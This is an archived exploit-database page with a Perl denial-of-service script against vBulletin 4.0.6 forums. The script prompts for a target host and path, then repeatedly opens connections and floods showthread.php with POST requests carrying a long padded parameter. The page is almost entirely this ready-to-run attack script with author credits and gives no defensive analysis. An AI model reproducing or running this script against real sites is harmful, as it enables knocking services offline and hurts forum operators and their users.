Home / os / win7

vBulletin 4.0.6 - Danial Of Service Exploit (redhat)

Posted on 02 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>vBulletin 4.0.6 - Danial Of Service Exploit (redhat)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== vBulletin 4.0.6 - Danial Of Service Exploit (redhat) ==================================================== ################################################ Author : KnocKout Thanks : DaiMon,BARCOD3 Contact : knockoutr@msn.com Tested on : redhat ############################################## ##################vBulletin 4.0.6 - Danial Of Service Exploit for RedHat############### #!/usr/bin/perl use IO::Socket; print &quot; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ &quot;; print &quot;+ vBulletin 4.0.6 D.O.S Exploit(FOR redhat) + &quot;; print &quot;+ Coded by KnocKout + &quot;; print &quot;+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ &quot;; print &quot;Host |without http://www.| &quot;; chomp($host = &lt;STDIN&gt;); print &quot;Path |example. /en or / | &quot;; chomp($pth = &lt;STDIN&gt;); { while($x != 999999) { $postit = &quot;?t=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000&quot;; $lrg = length $postit; my $sock = new IO::Socket::INET ( PeerAddr =&gt; &quot;$host&quot;, PeerPort =&gt; &quot;80&quot;, Proto =&gt; &quot;tcp&quot;, ); die &quot; Offline! - We can not Connect To '$host' it May be DoSed &quot; unless $sock; print $sock &quot;POST $pth/showthread.php HTTP/1.1 &quot;; print $sock &quot;Host: $host &quot;; print $sock &quot;Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 &quot;; print $sock &quot;Referer: $host &quot;; print $sock &quot;Accept-Language: en-us &quot;; print $sock &quot;Content-Type: application/x-www-form-urlencoded &quot;; print $sock &quot;Accept-Encoding: gzip, deflate &quot;; print $sock &quot;User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 &quot;; print $sock &quot;Connection: Keep-Alive &quot;; print $sock &quot;Cache-Control: no-cache &quot;; print $sock &quot;Content-Length: $lrg &quot;; print $sock &quot;$postit &quot;; close($sock); syswrite STDOUT, &quot;Attack Started &quot;; $x++; } } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-02]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP